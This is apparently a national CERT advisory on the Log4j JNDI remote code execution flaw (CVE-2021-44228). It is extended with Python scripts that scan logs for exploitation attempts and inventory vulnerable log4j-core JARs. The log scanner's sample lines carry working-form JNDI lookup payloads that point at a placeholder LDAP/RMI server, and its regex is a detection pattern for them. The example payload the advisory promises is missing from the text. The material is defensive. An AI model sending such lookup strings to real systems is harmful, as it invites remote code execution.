Advisory No: TZCERT/SA/2021/12/14
Date of First Release: 14th December 2021
Software Affected: All versions of Log4j from 2.0-beta9 to 2.14.1
Apache Log4j versions 2.0 to 2.14.1 are vulnerable to unauthenticated arbitrary code execution. A remote attacker can exploit the vulnerability to run malicious code on the affected machine.
Log4j is an open-source logging library widely used by Java applications to record log messages. Log4j is used by approximately 3 billion devices running Java, including web servers, mobile devices, and even smart devices such as fridges. The affected versions are vulnerable to arbitrary code execution.
The vulnerability resides in the Java Naming and Directory Interface (JNDI) lookup feature and its Lightweight Directory Access Protocol (LDAP) connector, and can be triggered using a crafted LDAP lookup. It allows an attacker to retrieve a payload from a remote server and have it executed on the affected machine.
To exploit the vulnerability, an attacker sends a request containing a malicious payload to the application. The crafted payload looks like the following request:
When the vulnerable Log4j logs the attacker's input, it interprets the string contained in the payload as a JNDI resource and makes a request to the attacker-controlled server to retrieve that resource. The attacker can send back a remote Java class file, which is then loaded by the vulnerable application.
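As an added illustration that is not part of the advisory, the following Python script shows how a defender can look for attempted exploitation in web-server access logs. It URL-decodes each line (bounded, so double-encoded input is also visible) and searches for the JNDI lookup syntax that the advisory describes Log4j interpreting, reporting the source address and the protocol scheme for triage. The log lines, IP addresses and field layout are constructed samples, not data from the advisory.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the advisory).
# Line 1 is benign; line 2 carries a JNDI lookup string in the User-Agent
# field; line 3 carries a percent-encoded one in the query string.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Dec/2021:10:01:02 +0300] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Dec/2021:10:01:07 +0300] "GET /login HTTP/1.1" 200 318 "-" "${jndi:ldap://203.0.113.10:1389/a}"
10.0.0.9 - - [14/Dec/2021:10:01:09 +0300] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.10%3A1099%2Fb%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"
"""

# A Log4j lookup has the form ${jndi:<scheme>:...}. The scheme is captured so
# the analyst can see which protocol the remote server is expected to speak.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def normalise(line: str, rounds: int = 3) -> str:
    """URL-decode repeatedly, with a bound, so encoded lookups become visible."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def scan_log(text: str) -> list:
    """Return one finding per log line that contains a JNDI lookup string."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        match = JNDI_LOOKUP.search(normalise(raw))
        if match:
            findings.append({
                "line": line_no,
                "source_ip": raw.split(" ", 1)[0],   # first token of a combined-format line
                "scheme": match.group(1).lower(),
            })
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: JNDI lookup via {hit['scheme']} from {hit['source_ip']}")
```

Two caveats for anyone running this against real logs: any field that the application logs (request headers, form fields, usernames) can carry the lookup string, so scan every log where user-supplied input is recorded, not only the access log; and Log4j's lookup syntax can be written in forms that hide the keyword from a simple pattern, so an empty result does not prove the absence of attempts. The check is a triage aid; applying the vendor updates is the fix.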
This vulnerability is assigned CVE-2021-44228, with a CVSS severity score of 10 out of 10.
Successful exploitation of this vulnerability may allow an attacker to take control of the affected systems.
Apache has issued updates that fix the vulnerable versions of Log4j. Users and administrators are encouraged to apply the necessary updates.
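Before and after applying updates, administrators need to know which log4j-core JARs are present on a host and whether each falls in the affected range stated above (2.0-beta9 to 2.14.1). The following Python script is an added example, not tooling from the advisory or from Apache: it walks a directory tree, reads the version Maven records inside each JAR at META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties (the standard location for Maven-built artifacts), and compares it against the affected range with pre-release tags such as beta9 ordered below the final release. The fake-JAR builder at the end is a constructed fixture so the script can be exercised offline.

```python
import io
import re
import zipfile
from pathlib import Path

# Standard location of the Maven build metadata inside a log4j-core JAR.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def version_key(version: str) -> tuple:
    """Turn '2.0-beta9', '2.14.1' or '2.15.0' into a sortable tuple.

    A pre-release (beta/rc) sorts below the final release of the same number,
    which is what lets 2.0-beta9 fall inside the affected range while 2.0-beta8
    and 1.x fall outside it.
    """
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([a-z]+)(\d*))?", version.strip(), re.IGNORECASE)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch, tag, num = m.groups()
    if tag:
        return (int(major), int(minor), int(patch or 0), 0, tag.lower(), int(num or 0))
    return (int(major), int(minor), int(patch or 0), 1, "", 0)


# Affected range as stated in the advisory header.
AFFECTED_LOW = version_key("2.0-beta9")
AFFECTED_HIGH = version_key("2.14.1")


def is_affected(version: str) -> bool:
    """True when the version lies within the advisory's affected range."""
    return AFFECTED_LOW <= version_key(version) <= AFFECTED_HIGH


def jar_version(jar_bytes: bytes):
    """Return the log4j-core version recorded by Maven inside the JAR, or None
    if the JAR is not log4j-core (or carries no Maven metadata)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        if POM_PROPERTIES not in zf.namelist():
            return None
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    return None


def scan_directory(root) -> list:
    """Walk root for *.jar files and report (path, version, affected) for each log4j-core found."""
    findings = []
    for path in Path(root).rglob("*.jar"):
        try:
            version = jar_version(path.read_bytes())
        except zipfile.BadZipFile:
            continue  # not a real JAR; skip rather than abort the whole scan
        if version is not None:
            findings.append((str(path), version, is_affected(version)))
    return findings


def make_fake_jar(version: str) -> bytes:
    """Constructed test fixture: a minimal JAR carrying only the Maven metadata."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES,
                    f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    for path, version, affected in scan_directory(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{'AFFECTED ' if affected else 'ok       '} {version:<10} {path}")
```

Run it with the application's installation root as the argument. A result of "ok" for every JAR is only as good as the scan's coverage: log4j-core can also be bundled inside WAR/EAR archives or shaded into an application JAR under a different name, in which case the Maven metadata path above will not be present and the library has to be located by other means (for example by searching archives for the JndiLookup class file).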